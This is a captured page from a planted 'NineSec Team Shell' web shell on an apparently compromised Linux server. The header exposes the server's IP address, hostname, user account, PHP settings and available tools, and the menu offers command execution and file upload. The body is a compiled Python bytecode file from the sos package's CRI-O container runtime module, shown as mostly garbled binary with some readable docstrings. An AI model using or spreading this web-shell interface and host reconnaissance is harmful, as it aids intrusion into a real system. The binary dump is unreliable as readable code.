NineSec Team Shell
Server IP : 184.107.3.203  /  Your IP : 216.73.216.51
Web Server : Apache
System : Linux dedicated2.avenfashion.com.ph 4.18.0-553.40.1.el8_10.x86_64 #1 SMP Mon Feb 10 12:11:18 EST 2025 x86_64
User : adminteladeoro ( 1015)
PHP Version : 8.2.28
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /usr/lib/python3.6/site-packages/sos/policies/runtimes/__pycache__/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : //usr/lib/python3.6/site-packages/sos/policies/runtimes/__pycache__/crio.cpython-36.pyc
3

~�gm
�@s@ddlZddlmZddlmZddlmZGdd�de�ZdS)�N)�quote)�ContainerRuntime)�sos_get_command_outputc@s:eZdZdZdZdZdd�Zddd�Zd	d
�Zdd�Z	d
S)�CrioContainerRuntimez-Runtime class to use for systems running crioZcrioZcrictlcCsdS)NF�)�selfrr�/usr/lib/python3.6/crio.py�check_can_copysz#CrioContainerRuntime.check_can_copyFcCs~g}|j�d|rdnd�d�}|jrzt||jjd�}|ddkrztj|d�}x*|d	D]}|j|d
|ddf�qXW|S)
z�Get a list of containers present on the system.

        :param get_all: If set, include stopped containers as well
        :type get_all: ``bool``
        z ps z-a�z -o json)�chroot�statusr�output�
containers�idZmetadata�name)�binary�activer�policy�sysroot�json�loads�append)rZget_allrZ_cmd�out�out_json�	containerrrr�get_containerssz#CrioContainerRuntime.get_containerscCs�g}|jr�t|j�d�|jjd�}|ddkr�tj|d�}x�|dD]|}t|d�dkr�xf|dD]}|j||df�qdWqFt|d	�dkr�d
}n|d	dj	d�d}|j|d|df�qFW|S)
z�Get a list of images present on the system

        :returns: A list of 2-tuples containing (image_name, image_id)
        :rtype: ``list``
        z images -o json)rrrr
�imagesZrepoTagsrZrepoDigestsz<none>�@z:<none>)
rrrrrrr�lenr�split)rrrrZimageZrepo_tagZ
image_namerrr�
get_images,szCrioContainerRuntime.get_imagescCs>|rt|�}n|}|j|�}|dk	r:|j�d|�d|��SdS)a�Format a command to run inside a container using the runtime

        :param container: The name or ID of the container in which to run
        :type container: ``str``

        :param cmd: The command to run inside `container`
        :type cmd: ``str``

        :param quotecmd: Whether the cmd should be quoted.
        :type quotecmd: ``bool``

        :returns: Formatted string to run `cmd` inside `container`
        :rtype: ``str``
        N� r
)rZget_container_by_nameZrun_cmd)rr�cmdZquotecmdZ
quoted_cmdZcontainer_idrrr�fmt_container_cmdEs


z&CrioContainerRuntime.fmt_container_cmdN)F)
�__name__�
__module__�__qualname__�__doc__rrr	rr r#rrrrrs
r)rZshlexrZsos.policies.runtimesrZ
sos.utilitiesrrrrrr�<module>
s

NineSec Team - 2022